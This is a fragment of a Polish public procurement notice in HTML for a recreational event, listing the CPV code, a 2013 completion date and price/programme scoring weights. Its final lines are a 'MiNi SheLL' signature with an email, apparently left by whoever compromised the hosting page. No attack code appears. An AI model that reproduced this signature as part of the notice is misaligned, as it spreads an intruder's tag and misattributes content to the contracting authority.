Zamawiający wymaga wskazania przez Wykonawcę terminu rozpoczęcia realizacji 1 imprezy w miesiącu lipcu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. atrakcyjność programu rekreacyjnego - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com